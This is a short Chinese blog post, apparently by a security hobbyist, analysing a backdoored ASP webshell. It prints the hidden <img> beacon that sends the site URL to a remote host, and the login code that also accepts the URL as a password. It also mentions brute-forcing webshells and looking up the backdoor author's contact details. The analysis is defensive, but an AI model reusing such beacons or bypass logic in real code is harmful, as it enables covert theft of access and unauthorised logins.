webshell后门分析第一篇

  今天一位学员发来了webshell箱子 但是箱子里面没有明显的密码 不像以前的箱子

     这种webshell箱子 引起了我莫大的兴趣。

如图：

  

 

       立马想了一个方案。。随便找了几个webshell 进行爆破 。

        几分钟后得到一个webshell

       注:webshell 没有加密的 这里没得写解密过程了。

       下了个asp小型服务器 打开进程里面 进行监控 输入正确密码 查找一切GET /POST之类的相关连接

       果断有发现 如图所示：

           

 

       留意host 这里估计就是收信的地址 whois 果断得到 箱子作者的QQ邮箱加QQ号 其实我真不想社 俺晚上还有初中聚会岂能表现出闲得蛋疼的样子，果断不扯淡做箱子的人。

       这里感到很奇怪 以往的的webshell箱子 都是获取网址+密码 然后发送到远程服务器。 但是这个webshell很另类。难道我孤陋寡闻。还是 落后了 我的思想。

      看到

<img src='http://www.moonhack.org/web/pr/?"&u&"'></img>

 

 

看到这个标签 我表示作者真的很有水平，<img>我表示成功登陆 肯定会执行一次 ，所以在远程服务器做一个记录就行了。多隐蔽但是岂能 逃出哥的法眼。

         回想起 我们之前箱子所说 后缀 参数 这里不知道我说什么，请回去看我们第一张高清有码图。根据这个这些 我仔细阅读了这份没有加密的网马 ？果断有所发现：

       如图所示：

              

              跟踪 URL变量 三十二个有木有

       如图所示：

              

       好吧 我仔细看 看到这块代码 感觉不对

 

if session("KKK")<>UserPass then

 

if request.form("pass")<>"" or request("pass")<>"" then

 

if request.form("pass")=UserPass or request.form("pass")=url then

 

session("KKK")=UserPass

 

response.redirect url

 

else

 

最后一个if 有逻辑问题 传入来的变量 等于UserPass或者 等于url 只有满足其中一个就可以登录了。

 

         最后结果如图：

                    

                 ---------------淫荡分割-------

                   

                     分析完毕后 又发来一只网马  好吧 等我聚会回来继续帮你分析